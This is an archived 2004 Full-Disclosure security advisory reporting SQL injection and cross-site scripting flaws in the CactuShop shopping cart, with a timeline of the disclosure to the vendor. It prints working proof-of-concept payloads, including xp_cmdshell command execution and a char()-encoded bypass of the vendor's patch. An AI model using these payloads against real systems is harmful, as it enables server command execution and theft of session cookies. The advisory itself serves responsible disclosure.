Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] CactuSoft CactuShop v5.x shopping cart software multip

from [S-Quadra Security Research] Network Security [Permanent Link]
Subject: [Full-Disclosure] CactuSoft CactuShop v5.x shopping cart software multiple security vulnerabilities
Date: Wed, 31 Mar 2004 16:13:56 +0400 
      S-Quadra Advisory #2004-03-31

Topic: CactuSoft CactuShop v5.x shopping cart software multiple security
vulnerabilities
Severity: High
Vendor URL: http://www.cactushop.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040331.txt
Release date: 31 Mar 2004

1. DESCRIPTION

CactuShop is an ASP application for running an e-commerce web site. It
incorporates a databased catalogue system, front end pages for product
navigation, back end pages for updating product details and robust
basket code for memorizing product selections as a visitor moves around
the web site. ASP software is designed to run on a Microsoft NT or Win
2000 server and to use MS Access, MS SQL Server or MySQL as a backend.
Please visit http://www.cactushop.com for information about CactuShop
shopping cart.

2. DETAILS

-- Vulnerability 1: SQL Injection vulnerability

An SQL Injection vulnerability has been found in following scripts :
'mailorder.asp' and 'payonline.asp'. User supplied input parameter is
'strItems' not filtered before being used in an SQL query. Thus the
query modification through malformed input is possible.

Successful exploitation of this vulnerability can enable an attacker
to execute commands in the system (via MS SQL xp_cmdshell function).

-- Vulnerability 2: Cross Site Scripting vulnerability found in
'largeimage.asp'script

By injecting specially crafted javascript code in url and tricking a
user to visit it a remote attacker can steal user session id and gain
access to user's personal data.

--PoC code

--Vulnerability 1:

Platform: MS SQL Server as a backend

Posting this data to 'payonline.asp' executes 'dir c:' command

strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&
CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&
CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&
numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&
strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed

-- Vulnerability 2:

http://[target]/popuplargeimage.asp?strImageTag=<script>alert(document.cookie)</script>

3. FIX INFORMATION

11 Mar 2004: S-Quadra alerted CactuSoft (CactuShop developers) on these
issues.
15 Mar 2004: CactuSoft response:

"1) SQL Injection

On payonline.asp and all mailorder pages the strItems field is now
parsed for single-quote (') characters before being used with database
queries. Single quotes are escaped (replaced with 2 single-quotes) to
ensure SQL Injection won't work.

2) Javascript Injection

The strImageTag field is parse for HTML tags characters (< and >) and
are removed from the string. This should ensure against <script> and any
other HTML tags.

This can be tested on the demo of the new CactuShop v5.1
(http://www.cactushop.com/cs51/)."

16 Mar 2004: S-Quadra tested patched version of CactuShop.
Vulnerabilities not fixed. New PoC Code:

 For SQL Injection

strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z

 For XSS:

http://[target]/popuplargeimage.asp?strImageTag=<img+src="uploads/images_products_large/113.gif"%20onLoad="alert(document.cookie)">

16 Mar 2004: S-Quadra alerted CactuSoft about new PoC Code.
26 Mar 2004: S-Quadra alerted CactuSoft about new PoC Code.

From 03.16.2004 Cactusoft dropped their communication with us so no
further response has been received therefore no new Fix information is
available.

4. CREDITS

Nick Gudov, chief security researcher at S-Quadra <cipher@s-quadra.com>
has detected above mentioned vulnerabilities.

5. ABOUT

S-Quadra dedicates its substantial knowledge and resources to managing
clients' IT security risks. S-Quadra audits and protection for software
and networks implement pioneering methods and ground-breaking
technologies.

       S-Quadra Advisory #2004-03-31


[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] CactuSoft CactuShop v5.x shopping cart software multiple security vulnerabilities, S-Quadra Security Research <=
Previous by Date:  [Full-Disclosure] Re: Your letter, illectro2001
Next by Date:  [Full-Disclosure] Re: SMTP Encryption (S/MIME) for Outlook question, i.t Consulting
Previous by Thread:  [Full-Disclosure] Panda 'phishing'?, Random Letters
Next by Thread:  [Full-Disclosure] internet-explorer: bug or feature?, ko5
Indexes:  [Date] [Thread] [Top] [All Lists]